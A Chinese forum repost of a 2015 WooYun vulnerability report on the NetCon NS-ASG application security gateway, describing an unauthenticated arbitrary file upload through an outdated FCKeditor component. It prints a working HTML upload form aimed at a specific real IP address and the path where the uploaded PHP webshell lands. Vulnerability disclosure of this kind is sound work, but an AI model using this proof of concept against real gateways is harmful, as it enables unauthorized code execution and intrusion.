发新话题
打印

网康NS-ASG应用安全网关任意文件上传(无需登录)

网康NS-ASG应用安全网关任意文件上传(无需登录)

漏洞标题 网康NS-ASG应用安全网关任意文件上传(无需登录)
相关厂商 网康科技
漏洞作者 menmen519
提交时间 2015-01-03 00:16
公开时间 2015-04-03 00:18
漏洞类型 文件上传导致任意代码执行
危害等级 高
自评Rank 20
漏洞状态 厂商已经确认
Tags标签

漏洞详情发现存在fckeditor:
https://122.226.150.69/admin/fckeditor/editor/filemanager/upload/php/upload.php
这个版本比较低2.4.3,直接构造poc:
<form enctype="multipart/form-data" action="https://122.226.150.69/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">   
<input name="NewFile" type="file">   
<input type="submit" value="submit">   
</form>
然后访问:
https://122.226.150.69/vpnweb/userfiles/media/2011.php
直接shell大马


漏洞证明:
修复方案:
版权声明:转载请注明来源 menmen519@乌云
原文:http://www.secpulse.com/archives/30586.html

TOP

发新话题